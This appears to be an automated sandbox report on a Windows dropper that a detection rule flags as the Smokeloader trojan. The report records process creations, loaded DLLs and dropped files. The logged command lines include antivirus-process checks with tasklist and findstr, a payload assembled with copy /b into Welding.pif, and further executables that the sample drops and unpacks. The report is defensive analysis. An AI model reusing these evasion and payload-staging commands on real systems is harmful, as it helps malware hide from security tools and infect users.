Source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@27/22@2/3

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_0011A6AD GetLastError,FormatMessageW,

15_2_0011A6AD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00108DE9 AdjustTokenPrivileges,CloseHandle,		15_2_00108DE9
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00109399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		15_2_00109399

Source: C:\Users\user\Desktop\M13W1o3scc.exe

0_2_004044A5

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

15_2_00114148

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000BE36D QueryPerformanceFrequency,timeGetTime,LockResource,Sleep,

15_2_000BE36D

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8096
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Mutant created: \Sessions\1\BaseNamedObjects\prtscreen1566
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File created: C:\Users\user\AppData\Local\Temp\nsp6BB5.tmp

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat

Source: M13W1o3scc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: M13W1o3scc.exe

Virustotal: Detection: 11%

Source: C:\Users\user\Desktop\M13W1o3scc.exe

File read: C:\Users\user\Desktop\M13W1o3scc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\M13W1o3scc.exe "C:\Users\user\Desktop\M13W1o3scc.exe"
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8096 -s 1048
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\M13W1o3scc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: M13W1o3scc.exe

Static file information: File size 1210490 > 1048576

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: M13W1o3scc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.jozizud:R;.raxup:R;.maweb:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Unpacked PE file: 16.2.478F.tmp.exe.400000.1.unpack

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .jozizud
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .raxup
Source: ScreenUpdateSync[1].exe.15.dr	Static PE information: section name: .maweb
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .jozizud
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .raxup
Source: 478F.tmp.exe.15.dr	Static PE information: section name: .maweb

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DE93F push edi; ret	15_2_000DE941
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEA58 push esi; ret	15_2_000DEA5A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00118A4A push FFFFFF8Bh; iretd	15_2_00118A4C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000D8B75 push ecx; ret	15_2_000D8B88
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000CCBDB push eax; retf	15_2_000CCBF8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DEC33 push esi; ret	15_2_000DEC35
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000DED1C push edi; ret	15_2_000DED1E
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411716 push ecx; ret	15_2_00411729
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00410D35 push ecx; ret	15_2_00410D48
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0043EFB3 push dword ptr [esp+ecx-75h]; iretd	15_2_0043EFB7
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B035 push ecx; ret	16_2_0041B048
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0040020D pushfd ; iretd	16_2_00400211
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79FD push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8DFB push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E79EE push eax; ret	16_2_007E7A0C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E4A1F push 7DD07DC0h; iretd	16_2_007E4A30
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E8E02 push ds; retf	16_2_007E8E3F
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_007E3F19 pushfd ; iretd	16_2_007E3F1C
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB29C push ecx; ret	16_2_022BB2AF

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	File created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_001359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		15_2_001359B3
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		15_2_000C5EDA

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

